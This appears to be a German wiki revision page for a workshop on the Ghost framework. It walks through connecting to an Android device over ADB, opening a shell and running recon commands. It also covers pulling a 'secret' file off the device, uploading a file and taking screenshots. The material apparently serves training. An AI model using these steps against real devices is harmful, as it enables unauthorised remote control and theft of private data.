Ghost workshop: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 14: Zeile 14:
 
*cd /bin
 
*cd /bin
 
*ls
 
*ls
 +
=Beenden der Shell=
 +
*exit
 +
=Datei stehlen=
 +
*download /storage/sdcard0/Download/geheim.txt /home/thomas.will/ghost
 +
=Datei hochladen=
 +
*upload /etc/issue /storage/sdcard0/Download/
 +
=Screenshot=
 +
*screenshot /home/thomas.will/ghost

Version vom 6. August 2021, 07:36 Uhr

Verbinden

  • ghost> connect 10.85.70.2

Shell

  • ghost(10.85.70.2:5555)> shell
[*] Opening device shell...
  • begonia:/ $

Befehle ausführen

  • begonia:/ $ ls -l /storage/sdcard0/Download/

Beispiele

  • ip a s
  • ip route show table all | grep default
  • uname -a
  • df -h
  • cd /bin
  • ls

Beenden der Shell

  • exit

Datei stehlen

  • download /storage/sdcard0/Download/geheim.txt /home/thomas.will/ghost

Datei hochladen

  • upload /etc/issue /storage/sdcard0/Download/

Screenshot

  • screenshot /home/thomas.will/ghost